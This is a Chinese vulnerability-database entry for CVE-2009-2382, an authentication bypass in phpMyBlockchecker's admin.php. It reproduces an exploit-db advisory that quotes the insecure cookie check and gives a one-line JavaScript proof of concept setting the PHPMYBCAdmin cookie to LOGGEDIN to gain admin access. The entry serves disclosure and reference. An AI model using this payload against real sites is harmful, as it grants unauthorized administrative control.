jay-jayx0r phpmyblockchecker admin.php 用户认证及访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118043 漏洞类型 授权问题
发布时间 2009-06-30 更新时间 2009-06-30
CVE编号 CVE-2009-2382 CNNVD-ID CNNVD-200907-130
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9053
https://www.securityfocus.com/bid/43799
https://cxsecurity.com/issue/WLB-2009070120
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-130
|漏洞详情
PhpMyBlockchecker1.0.0055中的admin.php允许远程攻击者通过把PHPMYBCAdmincookie设置成LOGGEDIN绕过身份鉴别和获得管理员访问许可。
|漏洞EXP
################################################################################################################
[+] phpMyBlockchecker 1.0.0055 Insecure Cookie Handling Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#################################################################################################################

[+] Download Script :
http://sourceforge.net/project/showfiles.php?group_id=116966&package_id=152150&release_id=326884

[+] Insecure Cookie Handling

 - Vulnerable code in admin.php

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
if ($_COOKIE[PHPMYBCAdmin] == '') {
if (!$_POST[login] == 'login') {
die("Please Login:<BR><form method=post><input type=password
name=password><input type=hidden value=login name=login><input
type=submit></form>");
} elseif($_POST[password] == $bcadminpass) {
setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
header("Location: admin.php"); } else { die("Incorrect"); }
}
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 - PoC

    javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";
document.cookie = "1246371700; path=/";


#################################################################################################################

# milw0rm.com [2009-06-30]
|受影响的产品
phpMyBlockchecker phpMyBlockchecker 1.0.55
|参考资料

来源:XF
名称:phpmyblockchecker-phpmybcadmin-auth-bypass(51445)
链接:http://xforce.iss.net/xforce/xfdb/51445
来源:MILW0RM
名称:9053
链接:http://www.milw0rm.com/exploits/9053
来源:SECUNIA
名称:35660
链接:http://secunia.com/advisories/35660
来源:OSVDB
名称:55505
链接:http://osvdb.org/55505